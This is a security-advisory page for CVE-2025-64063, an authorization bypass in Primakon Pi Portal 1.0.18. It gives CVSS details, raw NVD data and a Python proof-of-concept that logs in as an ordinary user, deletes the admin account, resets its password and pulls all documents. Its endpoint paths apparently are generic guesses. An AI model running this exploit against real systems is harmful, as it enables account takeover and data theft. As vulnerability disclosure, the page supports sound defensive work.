Security Vulnerability Report
中文
CVE-2025-64063 CVSS 9.8 CRITICAL

CVE-2025-64063

Published: 2025-11-25 19:15:50
Last Modified: 2025-12-01 14:22:04
Source: [email protected]

Description

Primakon Pi Portal 1.0.18 API endpoints fail to enforce sufficient authorization checks when processing requests. Specifically, a standard user can exploit this flaw by sending direct HTTP requests to administrative endpoints, bypassing the UI restrictions. This allows the attacker to manipulate data outside their assigned scope, including: Unauthorized Account modification, modifying/deleting arbitrary user accounts and changing passwords by sending a direct request to the user management API endpoint; Confidential Data Access, accessing and downloading sensitive organizational documents via a direct request to the document retrieval API; Privilege escalation, This vulnerability can lead to complete compromise of data integrity and confidentiality, and Privilege Escalation by manipulating core system functions.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:primakon:project_contract_management:1.0.18:*:*:*:*:*:*:* - VULNERABLE
Primakon Pi Portal 1.0.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-64063 PoC - Primakon Pi Portal 1.0.18 Privilege Escalation Note: This PoC is for educational and authorized testing purposes only. """ import requests import json target_url = "http://target-server/primakon-pi-portal" # Step 1: Normal user login to obtain session token def login(username, password): """Authenticate with normal user credentials""" login_url = f"{target_url}/api/v1/auth/login" payload = { "username": username, "password": password } response = requests.post(login_url, json=payload) if response.status_code == 200: return response.json().get('token') return None # Step 2: Exploit - Access admin user management API without authorization def exploit_admin_access(token): """Bypass UI restrictions and access admin endpoints directly""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Exploit 1: Modify/delete arbitrary user accounts admin_user_url = f"{target_url}/api/v1/admin/users" user_payload = { "action": "delete", "target_user_id": 1 # Target admin account } response = requests.post(admin_user_url, headers=headers, json=user_payload) print(f"[!] User deletion attempt: {response.status_code}") # Exploit 2: Change any user's password password_change_url = f"{target_url}/api/v1/admin/change-password" pw_payload = { "user_id": 1, "new_password": "PwnedPass123!" } response = requests.post(password_change_url, headers=headers, json=pw_payload) print(f"[!] Password change attempt: {response.status_code}") # Exploit 3: Access sensitive organizational documents doc_url = f"{target_url}/api/v1/documents/retrieve" params = {"doc_id": "all"} # Attempt to retrieve all documents response = requests.get(doc_url, headers=headers, params=params) print(f"[!] Document access attempt: {response.status_code}") if response.status_code == 200: print(f"[+] Sensitive documents leaked: {response.text[:500]}...") # Main execution token = login("regular_user", "user_password") if token: print("[*] Normal user login successful") exploit_admin_access(token) else: print("[-] Authentication failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64063", "sourceIdentifier": "[email protected]", "published": "2025-11-25T19:15:50.373", "lastModified": "2025-12-01T14:22:04.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Primakon Pi Portal 1.0.18 API endpoints fail to enforce sufficient authorization checks when processing requests. Specifically, a standard user can exploit this flaw by sending direct HTTP requests to administrative endpoints, bypassing the UI restrictions. This allows the attacker to manipulate data outside their assigned scope, including: Unauthorized Account modification, modifying/deleting arbitrary user accounts and changing passwords by sending a direct request to the user management API endpoint; Confidential Data Access, accessing and downloading sensitive organizational documents via a direct request to the document retrieval API; Privilege escalation, This vulnerability can lead to complete compromise of data integrity and confidentiality, and Privilege Escalation by manipulating core system functions."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:primakon:project_contract_management:1.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "48EDD273-2C46-43C9-9473-27D2C14040CB"}]}]}], "references": [{"url": "https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64063.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.primakon.com/rjesenja/primakon-pcm/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.